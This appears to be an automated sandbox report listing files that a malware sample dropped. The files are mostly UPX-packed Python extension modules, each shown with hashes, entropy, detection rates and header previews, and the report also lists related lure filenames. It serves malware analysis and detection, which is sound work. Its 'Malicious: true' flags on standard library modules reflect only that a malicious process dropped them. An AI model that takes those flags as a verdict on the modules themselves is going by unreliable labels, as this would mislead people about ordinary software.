SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: VfCch0oSlP.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.10784.13987.exe, Detection: malicious, Browse Filename: SilentAim.exe, Detection: malicious, Browse Filename: yXLOWtfvSd.exe, Detection: malicious, Browse Filename: hh.hta, Detection: malicious, Browse Filename: hhh.hta, Detection: malicious, Browse Filename: Windows.exe, Detection: malicious, Browse Filename: explorer.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: D3C3.exe, Detection: malicious, Browse Filename: nudes.scr.exe, Detection: malicious, Browse Filename: wechat_XC560-1.exe, Detection: malicious, Browse Filename: trac.exe, Detection: malicious, Browse Filename: 1.js, Detection: malicious, Browse Filename: 1.js, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Muldrop.18.32423.7935.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Muldrop.18.32423.7935.exe, Detection: malicious, Browse Filename: capthca-bypass.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35704
Entropy (8bit):	7.6435790825425896
Encrypted:	false
SSDEEP:	768:PLHYfVmoLOfek+D29R73mq5QQKsapN0ID5nuXYiSyvvNPxWETS:PLHsIfeRD2jaqK/X0ID5nuX7SytPxE
MD5:	1B8CE772A230A5DA8CBDCCD8914080A5
SHA1:	40D4FAF1308D1AF6EF9F3856A4F743046FD0EAD5
SHA-256:	FA5A1E7031DE5849AB2AB5A177E366B41E1DF6BBD90C8D2418033A01C740771F
SHA-512:	D2FC21B9F58B57065B337C3513E7E6C3E2243B73C5A230E81C91DAFCB6724B521AD766667848BA8D0A428D530691FFC4020DE6CE9CE1EAA2BF5E15338114A603
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..c...c...c.......c...b...c...f...c...g...c...`...c...b...c.Q.b...c...b...c...n...c...c...c.......c...a...c.Rich..c.........................PE..d...^.Vc.........." ...!.`...........#.......................................P............`..........................................J..P....I..P....@......................DK..$..................................../..@...........................................UPX0....................................UPX1.....`.......R..................@....rsrc........@.......V..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48000
Entropy (8bit):	7.804339649997861
Encrypted:	false
SSDEEP:	768:lwAGUM8GBetg87It88blNUL6yfsFtHrrhhto+MQw5aZ/hLYpUHIDtVzR3YiSyvLk:qAG/k9MjCDErhhmQXfTHIDtVzV7SyD85
MD5:	80C69A1D87F0C82D6C4268E5A8213B78
SHA1:	BAE059DA91D48EAAC4F1BB45CA6FEEE2C89A2C06
SHA-256:	307359F1B2552B60839385EB63D74CBFE75CD5EFDB4E7CD0BB7D296FA67D8A87
SHA-512:	542CF4BA19DD6A91690340779873E0CB8864B28159F55917F98A192FF9C449ABA2D617E9B2B3932DDFEEE13021706577AB164E5394E0513FE4087AF6BC39D40D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!............Pd....................................................`.............................................H.................... .. ..................................................Pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.910249809084461
Encrypted:	false
SSDEEP:	1536:mmtchbmUHui4ehi47gdUCK41d34AANP8zj6V:/uhKUHuwPMO9y10P83
MD5:	2443ECADDFE40EE5130539024324E7FC
SHA1:	EA74AAF7848DE0A078A1510C3430246708631108
SHA-256:	9A5892AC0CD00C44CD7744D60C9459F302D5984DDB395CAEA52E4D8FD9BCA2DA
SHA-512:	5896AF78CF208E1350CF2C31F913AA100098DD1CF4BAE77CD2A36EC7695015986EC9913DF8D2EBC9992F8F7D48BBA102647DC5EE7F776593AE7BE36F46BD5C93
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ ..MA.CMA.CMA.CD9MCAA.C.4.BOA.C+.#CIA.C.4.BFA.C.4.BEA.C.4.BIA.C.9.BIA.C.=.BNA.CMA.C.A.C.4.BIA.CD9KCLA.C.4.BLA.C.4!CLA.C.4.BLA.CRichMA.C........................PE..d...,..e.........." ..... .......@...R...P................................................`..........................................s..l....p.......p..........<...........ht..$....................................^..8...........................................UPX0.....@..............................UPX1..... ...P......................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	58744
Entropy (8bit):	7.8341561308362255
Encrypted:	false
SSDEEP:	1536:k3Wq49sE7fzlG5lNXdrYMP0MkeBvGhd0LYXIDQPTl7Syw0Pxv:k3WqKT1GLZdrDkHhOEXIDQPTl6Exv
MD5:	B4C41A4A46E1D08206C109CE547480C7
SHA1:	9588387007A49EC2304160F27376AEDCA5BC854D
SHA-256:	9925AB71A4D74CE0CCC036034D422782395DD496472BD2D7B6D617F4D6DDC1F9
SHA-512:	30DEBB8E766B430A57F3F6649EEB04EB0AAD75AB50423252585DB7E28A974D629EB81844A05F5CB94C1702308D3FEDA7A7A99CB37458E2ACB8E87EFC486A1D33
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. \|..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.........p...........................................@............`.........................................H<.......9.......0.......................<.......................................(..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	107384
Entropy (8bit):	7.936833941258681
Encrypted:	false
SSDEEP:	3072:gzsRxWJXVyOgbHffu+MLtWH/WSWXb01KQiID5q1CAt6xN:HU/gbHfW6WSWLplCuG
MD5:	E9501519A447B13DCCA19E09140C9E84
SHA1:	472B1AA072454D065DFE415A05036FFD8804C181
SHA-256:	6B5FE2DEA13B84E40B0278D1702AA29E9E2091F9DC09B64BBFF5FD419A604C3C
SHA-512:	EF481E0E4F9B277642652CD090634E1C04702DF789E2267A87205E0FE12B00F1DE6CDD4FAFB51DA01EFA726606C0B57FCB2EA373533C772983FC4777DC0ACC63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.p.......... ........................................0............`..........................................,..P....)....... ..........H'...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......h..................@....rsrc........ .......l..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	34688
Entropy (8bit):	7.676872991541861
Encrypted:	false
SSDEEP:	768:YA1cXZ83zNDKJ/KDQI5zbp61ypRcTID5IubYiSyvaPxWEw:YwnzKUQ+p6mcTID5Iub7SyiPx
MD5:	0629BDB5FF24CE5E88A2DDCEDE608AEE
SHA1:	47323370992B80DAFB6F210B0D0229665B063AFB
SHA-256:	F404BB8371618BBD782201F092A3BCD7A96D3C143787EBEA1D8D86DED1F4B3B8
SHA-512:	3FAEFF1A19893257C17571B89963AF37534C189421585EA03DD6A3017D28803E9D08B0E4DACEEE01FFEDA21DA60E68D10083FE7DBDBBDE313A6B489A40E70952
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.P..........@ .......................................@............`..........................................;..P....9.......0..........,............;......................................@,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	86400
Entropy (8bit):	7.925569108441777
Encrypted:	false
SSDEEP:	1536:n8mFQO4KV4FqKFztYJgYFlXeppHFEtnp8bacIUmDIDe1Ye7SyOePx:cO4KV0qKTYhFlupdQ8WLvIDe1Yehx
MD5:	BFCA96ED7647B31DD2919BEDEBB856B8
SHA1:	7D802D5788784F8B6BFBB8BE491C1F06600737AC
SHA-256:	032B1A139ADCFF84426B6E156F9987B501AD42ECFB18170B10FB54DA0157392E
SHA-512:	3A2926B79C90C3153C88046D316A081C8DDFB181D5F7C849EA6AE55CB13C6ADBA3A0434F800C4A30017D2FBAB79D459432A2E88487914B54A897C4301C778551
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25976
Entropy (8bit):	7.49061594497297
Encrypted:	false
SSDEEP:	768:5y6HNbpr+8C6DJbpwDnIDRtuyYiSyvg7PxWEwm:b9+8FDgDnIDRtuy7SyI7Px7
MD5:	849B4203C5F9092DB9022732D8247C97
SHA1:	ED7BD0D6DCDCFA07F754B98ACF44A7CFE5DCB353
SHA-256:	45BFBAB1D2373CF7A8AF19E5887579B8A306B3AD0C4F57E8F666339177F1F807
SHA-512:	CC618B4FC918B423E5DBDCBC45206653133DF16BF2125FD53BAFEF8F7850D2403564CF80F8A5D4ABB4A8928FF1262F80F23C633EA109A18556D1871AFF81CD39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w*.\|.y.\|.y.\|.y...y.\|.y...x.\|.y...x.\|.y...x.\|.y...x.\|.y...x.\|.y.\|.y.\|.yY..x.\|.y...x.\|.y...x.\|.y...y.\|.y...x.\|.yRich.\|.y................PE..d...c.Vc.........." ...!.0..........`.....................................................`.........................................4...`....................`......................................................p...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31616
Entropy (8bit):	7.623702028566422
Encrypted:	false
SSDEEP:	768:r1y7nuEu7eOHtaqrSNHrp9LhIDstetYiSyvYPxWEwW:YruEuiON7raHfLhIDstet7SywPx
MD5:	97A40F53A81C39469CC7C8DD00F51B5D
SHA1:	6C3916FE42E7977D8A6B53BFBC5A579ABCF22A83
SHA-256:	11879A429C996FEE8BE891AF2BEC7D00F966593F1E01CA0A60BD2005FEB4176F
SHA-512:	02AF654AB73B6C8BF15A81C0E9071C8FAF064C529B1439A2AB476E1026C860CF7D01472945112D4583E5DA8E4C57F1DF2700331440BE80066DBB6A7E89E1C5AF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW{..9(..9(..9(.q.(..9(.r8)..9(.r<)..9(.r=)..9(.r:)..9(.r8)..9(..8(..9(S{8)..9(S{=)..9(.r4)..9(.r9)..9(.r.(..9(.r;)..9(Rich..9(........PE..d...e.Vc.........." ...!.P..........@........................................ ............`.........................................x...X...........................................................................P...@...........................................UPX0....................................UPX1.....P.......B..................@....rsrc................F..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24960
Entropy (8bit):	7.454617838702341
Encrypted:	false
SSDEEP:	384:c90Psz9rLZgNhzHjlnwX1hZa7gJXjDID7UuNBIYiSy1pCQYIPxh8E9VF0Nyb9:cjihFn43pzDID7Uu4YiSyv7PxWER
MD5:	0614691624F99748EF1D971419BDB80D
SHA1:	39C52450ED7E31E935B5B0E49D03330F2057747D
SHA-256:	AC7972502144E9E01E53001E8EEC3FC9AB063564678B784D024DA2036BA7384D
SHA-512:	184BC172C7BB8A1FB55C4C23950CBE5E0B5A3C96C1C555ED8476EDF79C5C729ED297112EE01B45D771E5C0055D2DC402B566967D1900B5ABF683EE8E668C5B26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	42872
Entropy (8bit):	7.71252337640455
Encrypted:	false
SSDEEP:	768:2Q8MABQICeXD2rh0LklHwh20hpJ72IDQwzFDYiSyvGPxWERfsxi:2TieXEhow072IDQwzFD7Sy+Px3sxi
MD5:	04E7EB0B6861495233247AC5BB33A89A
SHA1:	C4D43474E0B378A00845CCA044F68E224455612A
SHA-256:	7EFE25284A4663DF9458603BF0988B0F47C7DCF56119E3E853E6BDA80831A383
SHA-512:	D4EA0484363EDF284AC08A1C3356CC3112D410DD80FE5010C1777ACF88DBD830E9F668B593E252033D657A3431A79F7B68D09EB071D0C2CEB51632DBE9B8ED97
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w................................................$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56192
Entropy (8bit):	7.831040417505209
Encrypted:	false
SSDEEP:	1536:qfDL703/MAe3F53jYTG3vy+1MNLjZVID5QjI7SyBPx:kD03/MHbH6+eL/ID5QjIXx
MD5:	D9EEEEACC3A586CF2DBF6DF366F6029E
SHA1:	4FF9FB2842A13E9371CE7894EC4FE331B6AF9219
SHA-256:	67649E1E8ACD348834EFB2C927AB6A7599CF76B2C0C0A50B137B3BE89C482E29
SHA-512:	0B9F1D80FB92C796682DBA94A75FBCE0E4FBEAEDCCD50E21D42D4B9366463A830109A8CD4300AA62B41910655F8CA96ECC609EA8A1B84236250B6FD08C965830
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!.........`..P....p...................................0............`..........................................+..P....)....... .......................+..$...................................P...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	62336
Entropy (8bit):	7.846104968038435
Encrypted:	false
SSDEEP:	1536:I6ll/oOM5AGIyI1asq3YGDTgzOordBQkJIDt7o7/7Syi/Px:d/6AGLIcsq3YGn0ZQuIDt7ojEHx
MD5:	FD0F4AED22736098DC146936CBF0AD1D
SHA1:	E520DEF83B8EFDBCA9DD4B384A15880B036EE0CF
SHA-256:	50404A6A3DE89497E9A1A03FF3DF65C6028125586DCED1A006D2ABB9009A9892
SHA-512:	C8F3C04D87DA19041F28E1D474C8EB052FE8C03FFD88F0681EF4A2FFE29755CFD5B9C100A1B1D2FDB233CB0F70E367AF500CBD3CD4CE77475F441F2B2AA0AB8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............0.....................................................`.........................................p...d....................P......................................................@...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\_uuid.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22400
Entropy (8bit):	7.3532819751791
Encrypted:	false
SSDEEP:	384:MKbjUslT27KvpCuNZa7gJXTkIDewOYKIYiSy1pCQIJPxh8E9VF0NyYk:MIj3ltLNpDkIDewO6YiSyvWPxWEW
MD5:	3377AE26C2987CFEE095DFF160F2C86C
SHA1:	0CA6AA60618950E6D91A7DEA530A65A1CDF16625
SHA-256:	9534CB9C997A17F0004FB70116E0141BDD516373B37BBD526D91AD080DAA3A2B
SHA-512:	8E408B84E2130FF48B8004154D1BDF6A08109D0B40F9FAFB6F55E9F215E418E05DCA819F411C802792A9D9936A55D6B90460121583E5568579A0FDA6935852EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Rp^.<#^.<#^.<#W..#\.<#..="\.<#..9"R.<#..8"V.<#..?"].<#..="\.<#..="[.<#^.=#t.<#..4"_.<#..<"_.<#...#_.<#..>"_.<#Rich^.<#................PE..d...e.Vc.........." ...!. .......`.......p................................................`.........................................8...L....................@..........................................................@...........................................UPX0.....`..............................UPX1..... ...p......................@....rsrc................"..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_helpers.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	7.693215396297118
Encrypted:	false
SSDEEP:	384:YyQdVWwViGwdnG0o2JAP2XSc4oX3vkULZjlvPMyDZa7gJXnvV:+d0EipntaRDoX3vkULZnpf
MD5:	790CB22E1484A36874D3E91AD7127156
SHA1:	62D3F04F910B845977B842E74B7101A9A07B8449
SHA-256:	12D2088DD8FF30857006323800812874A2467D9406615A2C3B50F4FB2AF5C9FB
SHA-512:	102C53119F79DC5AC5391D8F41234663289D5DB49845D86CD84F97920BAAC35B57550C44DB8DDDCAFF01D02D810EFFFC818E84CC271E04F9B4FC1A16A25DFEEA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R!9X.@W..@W..@W..8...@W..?V..@W.]8V..@W..?R..@W..?S..@W..?T..@W..=V..@W..@V..@W.,._..@W.,.W..@W.,....@W.,.U..@W.Rich.@W.........PE..d....yce.........." ...%.p...........C.......................................p............`.........................................@b..`....`..P....`.......................b..$....................................O..@...........................................UPX0....................................UPX1.....p.......b..................@....rsrc........`.......f..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_http_parser.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.937334857912581
Encrypted:	false
SSDEEP:	1536:KFIPjnlL32iiGJpS0Z+UxiEp9s030SEHMV84amYynr:e0peGNZ+010Ns8bmY8
MD5:	9C1DE8C7752634CB01795F5ADF9C9ED4
SHA1:	1DA66AAEB726492F6C8DE6FA9A95BCAE7FD40514
SHA-256:	6C20B55CEF694D16E0FABCD5E8665DDE817132D54D06D5986B8A5D3219746A5D
SHA-512:	770D75077D98E58FC7155D59C376E9689B7266CC9457413055836D93F76766F7A4CDD4723D36B51766CB46D252A73DECFCD3AC369BD0A696015C702E66DCF92F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............a.Q.a.Q.a.Q...Q.a.Q...P.a.Q...P.a.Q...P.a.Q.a.QAa.Q...P.a.Q...P.a.Q...P.a.Q..P.a.Q..P.a.Q..}Q.a.Q..P.a.QRich.a.Q........PE..d....yce.........." ...%.0.......P..0....`................................................`.............................................h................... .....................................................0...@...........................................UPX0.....P..............................UPX1.....0...`...0..................@....rsrc................4..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_http_writer.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25088
Entropy (8bit):	7.661652717386834
Encrypted:	false
SSDEEP:	384:giunSGZm7hiJD/0PBnll7Y7KdZ/Lxm1/dnRo4KiVU7C8/4bKSFaZa7gJX43GV:gn1IliJDi5lW250VU7C8DSkpO
MD5:	4692B571D6B008770EB698F563A413CB
SHA1:	C21C50B9E8510366F0D388DE7D0BE793DDEE6904
SHA-256:	65BD9AE1B0F8EB6295E197E838E28748B76B54307E1D29D97F3BA4CA9E07C7E4
SHA-512:	841D0F0242A1262173934077D1E4D4A532CB3F19AF320FD0873031070EF4F391667AD35D875AAC76795C98849F9C1B5E6477C2BB0195FAC24F3329A9782A57B2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b!9T&@W.&@W.&@W./8..$@W.3?V.$@W.m8V.$@W.3?R.*@W.3?S..@W.3?T.%@W..=V.%@W.&@V..@W..._.'@W...W.'@W.....'@W...U.'@W.Rich&@W.........................PE..d....yce.........." ...%.`...........k... ................................................`.........................................@...h.......P............ ..$....................................................w..@...........................................UPX0....................................UPX1.....`... ...Z..................@....rsrc................^..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_websocket.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	19968
Entropy (8bit):	7.577385675089119
Encrypted:	false
SSDEEP:	384:R5nVmLcfRdmmokNVjFEci6Vnqz4hmlxjPskZa7gJXWSx:Y2RdmxkzT904hwPp7
MD5:	62286D90613BBD06372E493E374669A6
SHA1:	DAD338F674BF71F50C9F0944C8FCC3C6CA0358A8
SHA-256:	BD32698AA5A72A0A12BF8C02B12A37BE6E9B12FFE525BAB37C1A88E46AAE9E3A
SHA-512:	62F380E7D73C8425B87F7D2267055806B69D2BA15CDE03E5E5DFAD722EEF0C871871AFB1BB6A7563D7752A62DAFD638486118BC3C2D770B70CEF061C59A15CA4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R!9[.@W..@W..@W..8...@W..?V..@W.]8V..@W..?R..@W..?S..@W..?T..@W..=V..@W..@V..@W.,._..@W.,.W..@W.,....@W.,.U..@W.Rich.@W.........PE..d....yce.........." ...%.P..........P.....................................................`.........................................@...d.......P...............4...................................................P...@...........................................UPX0....................................UPX1.....P.......F..................@....rsrc................J..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info\METADATA

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	HTML document, Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	11348
Entropy (8bit):	5.155260943272538
Encrypted:	false
